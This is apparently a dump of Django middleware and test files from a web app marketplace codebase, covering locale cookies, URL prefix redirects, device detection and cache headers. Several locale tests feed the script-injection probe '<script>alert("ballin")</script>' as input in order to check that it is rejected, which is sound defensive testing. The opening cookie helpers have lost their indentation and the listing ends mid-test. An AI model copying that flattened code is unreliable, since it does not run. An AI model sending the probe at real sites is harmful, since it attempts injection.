from amo.urlresolvers import lang_from_accept_header, Prefixer
from amo.utils import urlparams
import mkt
import mkt.constants
def _set_cookie(self, key, value='', max_age=None, expires=None, path='/',
domain=None, secure=False):
self._resp_cookies[key] = value
self.COOKIES[key] = value
if max_age is not None:
self._resp_cookies[key]['max-age'] = max_age
if expires is not None:
self._resp_cookies[key]['expires'] = expires
if path is not None:
self._resp_cookies[key]['path'] = path
if domain is not None:
self._resp_cookies[key]['domain'] = domain
if secure:
self._resp_cookies[key]['secure'] = True
def _delete_cookie(self, key, path='/', domain=None):
self.set_cookie(key, max_age=0, path=path, domain=domain,
expires='Thu, 01-Jan-1970 00:00:00 GMT')
try:
del self.COOKIES[key]
except KeyError:
pass
class RequestCookiesMiddleware(object):
    """
    Allows setting and deleting of cookies from requests in exactly the same
    way as we do for responses.
    >>> request.set_cookie('name', 'value')
    The `set_cookie` and `delete_cookie` are exactly the same as the ones
    built into Django's `HttpResponse` class.
    I had a half-baked cookie middleware (pun intended), but then I stole this
    from Paul McLanahan: http://paulm.us/post/1660050353/cookies-for-django
    """
    def process_request(self, request):
        # Stash pending cookies on the request and bind the module-level
        # helpers as bound methods (Python 2 three-argument MethodType).
        request._resp_cookies = SimpleCookie()
        request.set_cookie = MethodType(_set_cookie, request, HttpRequest)
        request.delete_cookie = MethodType(_delete_cookie, request,
                                           HttpRequest)
    def process_response(self, request, response):
        # Copy any cookies that were set on the request onto the response.
        if getattr(request, '_resp_cookies', None):
            response.cookies.update(request._resp_cookies)
        return response
class RedirectPrefixedURIMiddleware(object):
    """
    Strip /<app>/ prefix from URLs.
    Redirect /<lang>/ URLs to ?lang=<lang> so `LocaleMiddleware`
    can then set a cookie.
    Redirect /<region>/ URLs to ?region=<region> so `RegionMiddleware`
    can then set a cookie.
    If it's calling /api/ which uses none of the above, then mark that on
    the request.
    """
    def process_request(self, request):
        request.API = False
        request.APP = amo.FIREFOX
        path_ = request.get_full_path()
        new_path = None
        new_qs = {}
        lang, app, rest = Prefixer(request).split_path(path_)
        if app:
            # Strip /<app> from URL.
            new_path = rest
        if lang:
            # Strip /<lang> from URL.
            if not new_path:
                new_path = rest
            new_qs['lang'] = lang.lower()
        # The candidate region is the first path segment.
        region, _, rest = path_.lstrip('/').partition('/')
        region = region.lower()
        if region == 'api':
            # API isn't a region, its a sign that you are using the api.
            request.API = True
        if region in mkt.regions.REGION_LOOKUP:
            # Strip /<region> from URL.
            if not new_path:
                new_path = rest
            new_qs['region'] = mkt.regions.REGION_LOOKUP[region].slug
        # Any stripped prefix triggers a redirect to the cleaned URL with
        # the equivalent query-string parameters.
        if new_path is not None:
            if not new_path or new_path[0] != '/':
                new_path = '/' + new_path
            # TODO: Make this a 301 when we enable region stores in prod.
            return http.HttpResponseRedirect(urlparams(new_path, **new_qs))
def get_accept_language(request):
    """Return the preferred language parsed from the Accept-Language header."""
    header = request.META.get('HTTP_ACCEPT_LANGUAGE', '')
    return lang_from_accept_header(header)
class LocaleMiddleware(object):
    """Figure out the user's locale and store it in a cookie.

    The 'lang' cookie stores two comma-separated values: the active
    language and the Accept-Language value it overrode (if any).
    """
    def process_request(self, request):
        a_l = get_accept_language(request)
        lang, ov_lang = a_l, ''
        stored_lang, stored_ov_lang = '', ''
        remembered = request.COOKIES.get('lang')
        if remembered:
            # Cookie format: "<lang>,<overridden accept-language>".
            chunks = remembered.split(',')[:2]
            stored_lang = chunks[0]
            try:
                stored_ov_lang = chunks[1]
            except IndexError:
                pass
            if stored_lang.lower() in settings.LANGUAGE_URL_MAP:
                lang = stored_lang
            if stored_ov_lang.lower() in settings.LANGUAGE_URL_MAP:
                ov_lang = stored_ov_lang
        if 'lang' in request.REQUEST:
            # `get_language` uses request.GET['lang'] and does safety checks.
            ov_lang = a_l
            lang = Prefixer(request).get_language()
        elif a_l != ov_lang:
            # Change if Accept-Language differs from Overridden Language.
            lang = a_l
            ov_lang = ''
        # Update cookie if values have changed.
        if lang != stored_lang or ov_lang != stored_ov_lang:
            request.LANG_COOKIE = ','.join([lang, ov_lang])
        if (getattr(request, 'amo_user', None)
            and request.amo_user.lang != lang):
            # Persist the resolved locale on the user's profile.
            request.amo_user.lang = lang
            request.amo_user.save()
        request.LANG = lang
        tower.activate(lang)
    def process_response(self, request, response):
        # We want to change the cookie, but didn't have the response in
        # process request.
        if (hasattr(request, 'LANG_COOKIE') and
            not getattr(request, 'API', False)):
            response.set_cookie('lang', request.LANG_COOKIE)
        if request.REQUEST.get('vary') == '0':
            del response['Vary']
        else:
            patch_vary_headers(response, ['Accept-Language', 'Cookie'])
        return response
class DeviceDetectionMiddleware(object):
    """If the user has flagged that they are on a device. Store the device.

    Sets request.MOBILE / request.GAIA / request.TABLET flags and keeps a
    cookie per legacy device flag in sync on the response.
    """
    devices = ['mobile', 'gaia', 'tablet']
    def process_request(self, request):
        # An explicit ?dev= parameter wins over everything else.
        dev = request.GET.get('dev')
        if dev:
            setattr(request, 'MOBILE', dev == 'android')
            setattr(request, 'GAIA', dev == 'firefoxos')
            setattr(request, 'TABLET', dev == 'desktop')
            return
        # TODO: These are deprecated, remove them. Update the docs (and API
        # docs).
        for device in self.devices:
            # The XMobility middleware might have already set this.
            if getattr(request, device.upper(), False):
                continue
            qs = request.GET.get(device, False)
            cookie = request.COOKIES.get(device, False)
            # If the qs is True or there's a cookie set the device. But not if
            # the qs is False.
            if qs == 'true' or (cookie and not qs == 'false'):
                setattr(request, device.upper(), True)
                continue
            # Otherwise set to False.
            setattr(request, device.upper(), False)
    def process_response(self, request, response):
        for device in self.devices:
            active = getattr(request, device.upper(), False)
            cookie = request.COOKIES.get(device, False)
            if not active and cookie:
                # If the device isn't active, but there is a cookie, remove it.
                response.delete_cookie(device)
            elif active and not cookie and not getattr(request, 'API', False):
                # Set the device if it's active and there's no cookie.
                response.set_cookie(device, 'true')
        return response
class DoNotTrackTrackingMiddleware(object):
    """A small middleware to record DNT counts in statsd."""

    def process_request(self, request):
        # Bucket every request by its Do-Not-Track header state.
        meta = request.META
        if 'HTTP_DNT' not in meta:
            statsd.incr('z.mkt.dnt.unset')
        elif meta.get('HTTP_DNT') == '1':
            statsd.incr('z.mkt.dnt.on')
        else:
            statsd.incr('z.mkt.dnt.off')
class CacheHeadersMiddleware(object):
    """
    Unlike the `django.middleware.cache` middlewares, this middleware
    simply sets the `Cache-Control`, `ETag`, `Expires`, and `Last-Modified`
    headers and doesn't do any caching of the response object.
    """
    allowed_methods = ('GET', 'HEAD', 'OPTIONS')
    allowed_statuses = (200,)
    def process_response(self, request, response):
        # Opt-in only: the client must pass ?cache=1, and the request must
        # be a safe method with a 200 response.
        if (request.method in self.allowed_methods and
            response.status_code in self.allowed_statuses and
            request.REQUEST.get('cache') == '1'):
            timeout = get_max_age(response)
            if timeout is None:
                timeout = settings.CACHE_MIDDLEWARE_SECONDS or 0
            if timeout != 0:
                # Only bother setting caching headers for a non-zero max-age.
                patch_response_headers(response, timeout)
                patch_cache_control(response, must_revalidate=True)
        return response
########NEW FILE########
__FILENAME__ = models
class DynamicBoolFieldsMixin(object):
    """Mixin exposing a model's boolean ``has_*`` fields in bulk."""

    def _fields(self):
        """Returns array of all field names starting with 'has'."""
        return [field.name for field in self._meta.fields
                if field.name.startswith('has')]

    def to_dict(self):
        # Map each has_* field name to its current value on this instance.
        return dict((name, getattr(self, name)) for name in self._fields())

    def to_keys(self):
        # Only the field names whose value is truthy.
        return [name for name, value in self.to_dict().iteritems() if value]

    def to_list(self):
        # Strip the `has_` prefix and translate each key through
        # `field_source` (supplied by the concrete model).
        names = [self.field_source[key[4:].upper()]['name']
                 for key in self.to_keys()]
        return sorted(names)
########NEW FILE########
__FILENAME__ = test_forms
import mock
from nose.tools import eq_
import amo.tests
from users.models import UserProfile
from mkt.site.fixtures import fixture
from mkt.site.forms import AbuseForm, PotatoCaptchaForm
class PotatoCaptchaTestCase(amo.tests.TestCase):
    """Shared fixture: an anonymous mock request plus valid honeypot data."""
    def setUp(self):
        self.request = mock.Mock()
        self.request.META = {}
        self.request.user = mock.Mock()
        self.context = {'request': self.request}
        # Anonymous by default; individual tests flip this.
        self.request.user.is_authenticated = lambda: False
        # tuber blank + sprout == 'potato' is what a human submission looks like.
        self.data = {'tuber': '', 'sprout': 'potato'}
class TestPotatoCaptchaForm(PotatoCaptchaTestCase):
    """The honeypot form validates only when the captcha fields look human."""
    fixtures = fixture('user_999')
    def test_success_authenticated(self):
        # Authenticated users skip the captcha fields entirely.
        self.request.user = UserProfile.objects.get(id=999)
        self.request.user.is_authenticated = lambda: True
        form = PotatoCaptchaForm({}, request=self.request)
        eq_(form.is_valid(), True)
    def test_success_anonymous(self):
        data = {'tuber': '', 'sprout': 'potato'}
        form = PotatoCaptchaForm(data, request=self.request)
        eq_(form.is_valid(), True)
    def test_error_anonymous_bad_tuber(self):
        # A filled-in honeypot field marks the submitter as a bot.
        data = {'tuber': 'HAMMMMMMMMMMMMM', 'sprout': 'potato'}
        form = PotatoCaptchaForm(data, request=self.request)
        eq_(form.is_valid(), False)
    def test_error_anonymous_bad_sprout(self):
        # Missing the JS-set 'potato' value also fails validation.
        data = {'tuber': 'HAMMMMMMMMMMMMM', 'sprout': ''}
        form = PotatoCaptchaForm(data, request=self.request)
        eq_(form.is_valid(), False)
    def test_error_anonymous_bad_tuber_and_sprout(self):
        form = PotatoCaptchaForm({}, request=self.request)
        eq_(form.is_valid(), False)
class TestAbuseForm(PotatoCaptchaTestCase):
    """AbuseForm adds a required free-text field on top of the captcha."""
    def setUp(self):
        # Does not call super(); builds its own bare mock request and data.
        self.request = mock.Mock()
        self.data = {'tuber': '', 'sprout': 'potato', 'text': 'test'}
    def test_success(self):
        form = AbuseForm(self.data, request=self.request)
        eq_(form.is_valid(), True)
    def test_error_text_required(self):
        self.data['text'] = ''
        form = AbuseForm(self.data, request=self.request)
        eq_(form.is_valid(), False)
        eq_(form.errors, {'text': [u'This field is required.']})
########NEW FILE########
__FILENAME__ = test_helpers
# -*- coding: utf-8 -*-
from django.conf import settings
import fudge
import mock
import amo
import amo.tests
from mkt.site.helpers import css, js
class TestCSS(amo.tests.TestCase):
    """css() should pass debug=True in dev or when ?debug=true is given."""
    @mock.patch.object(settings, 'TEMPLATE_DEBUG', True)
    @fudge.patch('mkt.site.helpers.jingo_minify_helpers')
    def test_dev_unminified(self, fake_css):
        request = mock.Mock()
        request.GET = {}
        context = {'request': request}
        # Should be called with `debug=True`.
        fake_css.expects('css').with_args('mkt/devreg', False, True)
        css(context, 'mkt/devreg')
    @mock.patch.object(settings, 'TEMPLATE_DEBUG', False)
    @fudge.patch('mkt.site.helpers.jingo_minify_helpers')
    def test_prod_minified(self, fake_css):
        request = mock.Mock()
        request.GET = {}
        context = {'request': request}
        # Should be called with `debug=False`.
        fake_css.expects('css').with_args('mkt/devreg', False, False)
        css(context, 'mkt/devreg')
    @mock.patch.object(settings, 'TEMPLATE_DEBUG', True)
    @fudge.patch('mkt.site.helpers.jingo_minify_helpers')
    def test_dev_unminified_overridden(self, fake_css):
        request = mock.Mock()
        request.GET = {'debug': 'true'}
        context = {'request': request}
        # Should be called with `debug=True`.
        fake_css.expects('css').with_args('mkt/devreg', False, True)
        css(context, 'mkt/devreg')
    @mock.patch.object(settings, 'TEMPLATE_DEBUG', False)
    @fudge.patch('mkt.site.helpers.jingo_minify_helpers')
    def test_prod_unminified_overridden(self, fake_css):
        # ?debug=true forces unminified CSS even in production.
        request = mock.Mock()
        request.GET = {'debug': 'true'}
        context = {'request': request}
        # Should be called with `debug=True`.
        fake_css.expects('css').with_args('mkt/devreg', False, True)
        css(context, 'mkt/devreg')
class TestJS(amo.tests.TestCase):
    """js() should pass debug=True in dev or when ?debug=true is given."""
    @mock.patch.object(settings, 'TEMPLATE_DEBUG', True)
    @fudge.patch('mkt.site.helpers.jingo_minify_helpers')
    def test_dev_unminified(self, fake_js):
        request = mock.Mock()
        request.GET = {}
        context = {'request': request}
        # Should be called with `debug=True`.
        fake_js.expects('js').with_args('mkt/devreg', True, False, False)
        js(context, 'mkt/devreg')
    @mock.patch.object(settings, 'TEMPLATE_DEBUG', False)
    @fudge.patch('mkt.site.helpers.jingo_minify_helpers')
    def test_prod_minified(self, fake_js):
        request = mock.Mock()
        request.GET = {}
        context = {'request': request}
        # Should be called with `debug=False`.
        fake_js.expects('js').with_args('mkt/devreg', False, False, False)
        js(context, 'mkt/devreg')
    @mock.patch.object(settings, 'TEMPLATE_DEBUG', True)
    @fudge.patch('mkt.site.helpers.jingo_minify_helpers')
    def test_dev_unminified_overridden(self, fake_js):
        request = mock.Mock()
        request.GET = {'debug': 'true'}
        context = {'request': request}
        # Should be called with `debug=True`.
        fake_js.expects('js').with_args('mkt/devreg', True, False, False)
        js(context, 'mkt/devreg')
    @mock.patch.object(settings, 'TEMPLATE_DEBUG', False)
    @fudge.patch('mkt.site.helpers.jingo_minify_helpers')
    def test_prod_unminified_overridden(self, fake_js):
        # ?debug=true forces unminified JS even in production.
        request = mock.Mock()
        request.GET = {'debug': 'true'}
        context = {'request': request}
        # Should be called with `debug=True`.
        fake_js.expects('js').with_args('mkt/devreg', True, False, False)
        js(context, 'mkt/devreg')
########NEW FILE########
__FILENAME__ = test_middleware
import datetime
from django.conf import settings
from django.test.utils import override_settings
import mock
from dateutil.tz import tzutc
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo.tests
from users.models import UserProfile
from mkt.site.middleware import DeviceDetectionMiddleware
from mkt.site.fixtures import fixture
# Locale whitelist used to patch settings.LANGUAGES/LANGUAGE_URL_MAP below.
_langs = ['cs', 'de', 'en-US', 'es', 'fr', 'pt-BR', 'pt-PT']
@mock.patch.object(settings, 'LANGUAGES', [x.lower() for x in _langs])
class TestRedirectPrefixedURIMiddleware(amo.tests.TestCase):
    """URL prefixes (/app/, /lang/, /region/) redirect to query-string form."""
    def test_redirect_for_good_application(self):
        for app in amo.APPS:
            r = self.client.get('/%s/' % app)
            self.assert3xx(r, '/', 302)
    def test_redirect_for_bad_application(self):
        r = self.client.get('/mosaic/')
        eq_(r.status_code, 404)
    def test_redirect_for_good_locale(self):
        redirects = [
            ('/en-US/', '/?lang=en-us'),
            ('/pt-BR/', '/?lang=pt-br'),
            ('/pt-br/', '/?lang=pt-br'),
            ('/fr/', '/?lang=fr'),
            ('/es-PE/', '/?lang=es'),
        ]
        for before, after in redirects:
            r = self.client.get(before)
            self.assert3xx(r, after, 302)
    def test_preserve_qs_for_lang(self):
        r = self.client.get('/pt-BR/firefox/privacy-policy?omg=yes')
        self.assert3xx(r, '/privacy-policy?lang=pt-br&omg=yes', 302)
        r = self.client.get('/pt-BR/privacy-policy?omg=yes')
        self.assert3xx(r, '/privacy-policy?lang=pt-br&omg=yes', 302)
    def test_switch_locale(self):
        # Locale in URL prefix takes precedence.
        r = self.client.get('/pt-BR/?lang=de')
        self.assert3xx(r, '/?lang=pt-br', 302)
    def test_no_locale(self):
        r = self.client.get('/robots.txt')
        eq_(r.status_code, 200)
        r = self.client.get('/robots.txt?lang=fr')
        eq_(r.status_code, 200)
    def test_redirect_for_good_region(self):
        redirects = [
            ('/restofworld/', '/?region=restofworld'),
            ('/worldwide/', '/?region=restofworld'),
            ('/br/', '/?region=br'),
            ('/us/', '/?region=us'),
            ('/BR/', '/?region=br'),
        ]
        for before, after in redirects:
            r = self.client.get(before)
            self.assert3xx(r, after, 302)
    def test_redirect_for_good_locale_and_region(self):
        # Both prefixes are stripped in a single redirect chain.
        r = self.client.get('/en-US/br/developers/support?omg=yes',
                            follow=True)
        # Can you believe this actually works?
        self.assert3xx(r,
            '/developers/support?lang=en-us&region=br&omg=yes', 302)
    def test_preserve_qs_for_region(self):
        r = self.client.get('/br/developers/support?omg=yes')
        self.assert3xx(r, '/developers/support?region=br&omg=yes', 302)
    def test_switch_region(self):
        r = self.client.get('/restofworld/?region=brazil')
        self.assert3xx(r, '/?region=restofworld', 302)
    def test_404_for_bad_prefix(self):
        for url in ['/xxx', '/xxx/search/',
                    '/brazil/', '/BRAZIL/',
                    '/pt/?lang=de', '/pt-XX/brazil/']:
            r = self.client.get(url)
            got = r.status_code
            eq_(got, 404, "For %r: expected '404' but got %r" % (url, got))
@mock.patch.object(settings, 'LANGUAGES', [x.lower() for x in _langs])
@mock.patch.object(settings, 'LANGUAGE_URL_MAP',
                   dict([x.lower(), x] for x in _langs))
class TestLocaleMiddleware(amo.tests.TestCase):
    """Exercises the 'lang' cookie state machine in LocaleMiddleware.

    Cookie format is "<lang>,<overridden accept-language>"; a None cookie
    expectation means no new cookie should be set on the response.
    """
    def test_accept_good_locale(self):
        # (query lang, resolved request.LANG, expected cookie or None).
        locales = [
            ('en-US', 'en-US', 'en-US,en-US'),
            ('pt-BR', 'pt-BR', 'pt-BR,en-US'),
            ('pt-br', 'pt-BR', None),
            ('fr', 'fr', 'fr,en-US'),
            ('es-PE', 'es', 'es,en-US'),
            ('fr', 'fr', 'fr,en-US'),
        ]
        for locale, r_lang, c_lang in locales:
            r = self.client.get('/robots.txt?lang=%s' % locale)
            if c_lang:
                eq_(r.cookies['lang'].value, c_lang)
            else:
                eq_(r.cookies.get('lang'), None)
            eq_(r.context['request'].LANG, r_lang)
    def test_accept_language_and_cookies(self):
        # Your cookie tells me pt-BR but your browser tells me en-US.
        self.client.cookies['lang'] = 'pt-BR,pt-BR'
        r = self.client.get('/robots.txt')
        eq_(r.cookies['lang'].value, 'en-US,')
        eq_(r.context['request'].LANG, 'en-US')
        # Your cookie tells me pt-br but your browser tells me en-US.
        self.client.cookies['lang'] = 'pt-br,fr'
        r = self.client.get('/robots.txt')
        eq_(r.cookies['lang'].value, 'en-US,')
        eq_(r.context['request'].LANG, 'en-US')
        # Your cookie tells me pt-BR and your browser tells me pt-BR.
        self.client.cookies['lang'] = 'pt-BR,pt-BR'
        r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='pt-BR')
        eq_(r.cookies.get('lang'), None)
        eq_(r.context['request'].LANG, 'pt-BR')
        # You explicitly changed to fr, and your browser still tells me pt-BR.
        # So no new cookie!
        self.client.cookies['lang'] = 'fr,pt-BR'
        r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='pt-BR')
        eq_(r.cookies.get('lang'), None)
        eq_(r.context['request'].LANG, 'fr')
        # You explicitly changed to fr, but your browser still tells me es.
        # So make a new cookie!
        self.client.cookies['lang'] = 'fr,pt-BR'
        r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='es')
        eq_(r.cookies['lang'].value, 'es,')
        eq_(r.context['request'].LANG, 'es')
    def test_ignore_bad_locale(self):
        # Good? Store language.
        r = self.client.get('/robots.txt?lang=fr')
        eq_(r.cookies['lang'].value, 'fr,en-US')
        # Bad? Reset language.
        r = self.client.get('/robots.txt?lang=')
        eq_(r.cookies['lang'].value, 'en-US,en-US')
        # Still bad? Don't change language.
        for locale in ('xxx', '<script>alert("ballin")</script>'):
            r = self.client.get('/robots.txt?lang=%s' % locale)
            eq_(r.cookies.get('lang'), None)
            eq_(r.context['request'].LANG, settings.LANGUAGE_CODE)
        # Good? Change language.
        r = self.client.get('/robots.txt?lang=fr')
        eq_(r.cookies['lang'].value, 'fr,en-US')
    def test_already_have_cookie_for_bad_locale(self):
        # Invalid stored cookies fall back to the default language.
        for locale in ('', 'xxx', '<script>alert("ballin")</script>'):
            self.client.cookies['lang'] = locale
            r = self.client.get('/robots.txt')
            eq_(r.cookies['lang'].value, settings.LANGUAGE_CODE + ',')
            eq_(r.context['request'].LANG, settings.LANGUAGE_CODE)
    def test_no_cookie(self):
        r = self.client.get('/robots.txt')
        eq_(r.cookies['lang'].value, settings.LANGUAGE_CODE + ',')
        eq_(r.context['request'].LANG, settings.LANGUAGE_CODE)
    def test_no_api_cookie(self):
        # API requests never get a lang cookie set.
        res = self.client.get('/api/v1/apps/schema/?region=restofworld',
                              HTTP_ACCEPT_LANGUAGE='de')
        ok_(not res.cookies)
    def test_cookie_gets_set_once(self):
        r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='de')
        eq_(r.cookies['lang'].value, 'de,')
        # Since we already made a request above, we should remember the lang.
        r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='de')
        eq_(r.cookies.get('lang'), None)
    def test_accept_language(self):
        # (Accept-Language header, expected resolved language).
        locales = [
            ('', settings.LANGUAGE_CODE),
            ('de', 'de'),
            ('en-us, de', 'en-US'),
            ('en-US', 'en-US'),
            ('fr, en', 'fr'),
            ('pt-XX, xx, yy', 'pt-PT'),
            ('pt', 'pt-PT'),
            ('pt, de', 'pt-PT'),
            ('pt-XX, xx, de', 'pt-PT'),
            ('pt-br', 'pt-BR'),
            ('pt-BR', 'pt-BR'),
            ('xx, yy, zz', settings.LANGUAGE_CODE),
            ('<script>alert("ballin")</script>', settings.LANGUAGE_CODE),
            ('en-us;q=0.5, de', 'de'),
            ('es-PE', 'es'),
        ]
        for given, expected in locales:
            r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE=given)
            got = r.cookies['lang'].value
            eq_(got, expected + ',',
                'For %r: expected %r but got %r' % (given, expected, got))
            got = r.context['request'].LANG
            eq_(got, expected,
                'For %r: expected %r but got %r' % (given, expected, got))
            self.client.cookies.clear()
    def test_accept_language_takes_precedence_over_previous_request(self):
        r = self.client.get('/robots.txt')
        eq_(r.cookies['lang'].value, settings.LANGUAGE_CODE + ',')
        # Even though you remembered my previous language, I've since
        # changed it in my browser, so let's respect that.
        r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='fr')
        eq_(r.cookies['lang'].value, 'fr,')
    def test_accept_language_takes_precedence_over_cookie(self):
        self.client.cookies['lang'] = 'pt-BR'
        r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='fr')
        eq_(r.cookies['lang'].value, 'fr,')
@mock.patch.object(settings, 'LANGUAGES', [x.lower() for x in _langs])
@mock.patch.object(settings, 'LANGUAGE_URL_MAP',
                   dict([x.lower(), x] for x in _langs))
class TestLocaleMiddlewarePersistence(amo.tests.TestCase):
    """The locale middleware saves the resolved language on the user."""
    fixtures = fixture('user_999')
    def test_save_lang(self):
        # A logged-in user's Accept-Language is persisted on the profile.
        self.client.login(username='[email protected]', password='password')
        self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='de')
        eq_(UserProfile.objects.get(pk=999).lang, 'de')
class TestVaryMiddleware(amo.tests.TestCase):
    """Check the Vary headers emitted (or suppressed) by the middleware."""
    fixtures = fixture('user_999')

    def _vary(self, res):
        """Return the response's Vary header as a list of field names."""
        # Replaces a lambda-assigned-to-a-name (PEP 8 E731) with a helper.
        return [x.strip() for x in res.get('Vary', '').split(',')]

    def test_vary_headers(self):
        # What is expected to `Vary`.
        res = self.client.get('/privacy-policy')
        eq_(res['Vary'], 'Accept-Language, Cookie')
        res = self.client.get('/privacy-policy', follow=True)
        eq_(res['Vary'], 'Accept-Language, Cookie')
        res = self.client.get('/api/v1/services/config/site/?vary=1')
        # DRF adds `Vary: Accept` by default, so let's not check that.
        assert 'Accept-Language' in self._vary(res), (
            'Expected "Vary: Accept-Language"')
        assert 'Cookie' in self._vary(res), 'Expected "Vary: Cookie"'
        res = self.client.get('/api/v1/services/config/site/?vary=0')
        assert 'Accept-Language' not in self._vary(res), (
            'Should not contain "Vary: Accept-Language"')
        assert 'Cookie' not in self._vary(res), (
            'Should not contain "Vary: Cookie"')

    # Patching MIDDLEWARE_CLASSES because other middleware tweaks vary headers.
    @mock.patch.object(settings, 'MIDDLEWARE_CLASSES', [
        'amo.middleware.CommonMiddleware',
        'amo.middleware.NoVarySessionMiddleware',
        'django.contrib.auth.middleware.AuthenticationMiddleware',
        'mkt.site.middleware.RequestCookiesMiddleware',
        'mkt.site.middleware.LocaleMiddleware',
        'mkt.regions.middleware.RegionMiddleware',
        'mkt.site.middleware.DeviceDetectionMiddleware',
    ])
    def test_no_user_agent(self):
        # We've toggled the middleware to not rewrite the application and also
        # not vary headers based on User-Agent.
        self.client.login(username='[email protected]', password='password')
        r = self.client.get('/robots.txt', follow=True)
        eq_(r.status_code, 200)
        assert 'firefox' not in r.request['PATH_INFO'], (
            'Application should not be in the request URL.')
        assert 'User-Agent' not in r['Vary'], (
            'User-Agent should not be in the "Vary" header.')
class TestDeviceMiddleware(amo.tests.TestCase):
    """DeviceDetectionMiddleware: device query params / cookies set the
    request's MOBILE / GAIA / TABLET flags and matching cookies."""
    # Devices toggled directly via `?<device>=true/false` query params.
    devices = ['mobile', 'gaia']
    def test_no_effect(self):
        # A plain request sets no device cookies or flags.
        r = self.client.get('/robots.txt', follow=True)
        for device in self.devices:
            assert not r.cookies.get(device)
            assert not getattr(r.context['request'], device.upper())
    def test_dev_firefoxos(self):
        req = self.client.get('/robots.txt?dev=firefoxos', follow=True)
        eq_(req.cookies['gaia'].value, 'true')
        assert getattr(req.context['request'], 'GAIA')
    def test_dev_android(self):
        req = self.client.get('/robots.txt?dev=android', follow=True)
        eq_(req.cookies['mobile'].value, 'true')
        assert getattr(req.context['request'], 'MOBILE')
    def test_dev_tablet(self):
        # NOTE(review): `?dev=desktop` asserting the TABLET flag looks
        # surprising — confirm against DeviceDetectionMiddleware's
        # dev -> device mapping.
        req = self.client.get('/robots.txt?dev=desktop', follow=True)
        eq_(req.cookies['tablet'].value, 'true')
        assert getattr(req.context['request'], 'TABLET')
    def test_force(self):
        for device in self.devices:
            r = self.client.get('/robots.txt?%s=true' % device, follow=True)
            eq_(r.cookies[device].value, 'true')
            assert getattr(r.context['request'], device.upper())
    def test_force_unset(self):
        # `<device>=false` clears a previously-set device cookie and flag.
        for device in self.devices:
            r = self.client.get('/robots.txt?%s=true' % device, follow=True)
            assert r.cookies.get(device)
            r = self.client.get('/robots.txt?%s=false' % device, follow=True)
            eq_(r.cookies[device].value, '')
            assert not getattr(r.context['request'], device.upper())
    def test_persists(self):
        # Once set via the cookie, the flag persists on later requests.
        for device in self.devices:
            r = self.client.get('/robots.txt?%s=true' % device, follow=True)
            assert r.cookies.get(device)
            r = self.client.get('/robots.txt', follow=True)
            assert getattr(r.context['request'], device.upper())
    def test_xmobile(self):
        # A MOBILE flag already present on the request (presumably set
        # upstream, e.g. from an X-Mobile header) must not be clobbered.
        rf = RequestFactory().get('/robots.txt')
        for state in [True, False]:
            rf.MOBILE = state
            DeviceDetectionMiddleware().process_request(rf)
            eq_(rf.MOBILE, state)
class TestCacheHeadersMiddleware(amo.tests.TestCase):
    """Cache headers are only set for cacheable, successful, safe requests
    that opt in via the `cache` querystring (see test_headers_set)."""
    seconds = 60 * 2

    def _test_headers_set(self, res):
        """Assert that all cache-related headers are present and coherent."""
        eq_(res['Cache-Control'],
            'must-revalidate, max-age=%s' % self.seconds)
        assert res.has_header('ETag'), 'Missing ETag header'
        now = datetime.datetime.now(tzutc())
        self.assertCloseToNow(res['Expires'],
            now=now + datetime.timedelta(seconds=self.seconds))
        self.assertCloseToNow(res['Last-Modified'], now=now)

    def _test_headers_missing(self, res):
        """Assert that only the ETag is present, no caching headers."""
        assert res.has_header('ETag'), 'Missing ETag header'
        for header in ['Cache-Control', 'Expires', 'Last-Modified']:
            assert not res.has_header(header), (
                'Should not have header: %s' % header)

    @override_settings(CACHE_MIDDLEWARE_SECONDS=seconds, USE_ETAGS=True)
    def test_no_headers_on_disallowed_statuses(self):
        res = self.client.get('/404')  # 404
        self._test_headers_missing(res)

    @override_settings(CACHE_MIDDLEWARE_SECONDS=seconds, USE_ETAGS=True)
    def test_no_headers_on_disallowed_methods(self):
        for method in ('delete', 'post', 'put'):
            res = getattr(self.client, method)('/robots.txt')
            self._test_headers_missing(res)

    @override_settings(CACHE_MIDDLEWARE_SECONDS=0, USE_ETAGS=True)
    def test_no_headers_no_max_age(self):
        self._test_headers_missing(self.client.get('/robots.txt'))

    # BUG FIX: this previously patched CACHE_MIDDLEWARE_SECONDS=0, which made
    # it an exact duplicate of test_no_headers_no_max_age and left the
    # "no querystring" path untested. With a non-zero max-age it now verifies
    # that omitting `?cache=1` (contrast with test_headers_set) is what
    # suppresses the caching headers.
    @override_settings(CACHE_MIDDLEWARE_SECONDS=seconds, USE_ETAGS=True)
    def test_no_headers_no_querystring(self):
        self._test_headers_missing(self.client.get('/robots.txt'))

    @override_settings(CACHE_MIDDLEWARE_SECONDS=seconds, USE_ETAGS=True)
    def test_headers_set(self):
        for method in ('get', 'head', 'options'):
            res = getattr(self.client, method)('/robots.txt?cache=1')
            self._test_headers_set(res)
########NEW FILE########
__FILENAME__ = test_persona_login
import collections
import json
from datetime import datetime
from urlparse import urlparse
from django.conf import settings
from django.core.urlresolvers import reverse
from mock import ANY, Mock, patch
from nose.tools import eq_
import amo
from access.models import Group, GroupUser
from users.models import UserProfile
from users.views import browserid_authenticate
def fake_request():
    """Build a Mock that stands in for an HTTP request in Persona login."""
    req = Mock()
    req.LANG = 'foo'
    req.GET = req.META = {}
    # Fake out host/scheme for Persona login.
    req.get_host.return_value = urlparse(settings.SITE_URL).netloc
    req.is_secure.return_value = False
    return req
# Lightweight stand-in for a `requests` response object.
FakeResponse = collections.namedtuple('FakeResponse', ['status_code', 'content'])
class TestPersonaLogin(amo.tests.TestCase):
    """End-to-end tests of the Persona/BrowserID login view, with the
    `requests.post` verifier call mocked out via FakeResponse."""
    fixtures = ('users/test_backends',)
    def setUp(self):
        super(TestPersonaLogin, self).setUp()
        self.client = amo.tests.TestClient()
        self.client.get('/')
        self.user = UserProfile.objects.get(id='4043307')
        self.url = reverse('users.browserid_login')
        self.data = {'username': '[email protected]', 'password': 'foo'}
    @patch('requests.post')
    def test_browserid_login_success(self, http_request):
        """
        A success response from BrowserID results in successful login.
        """
        url = reverse('users.browserid_login')
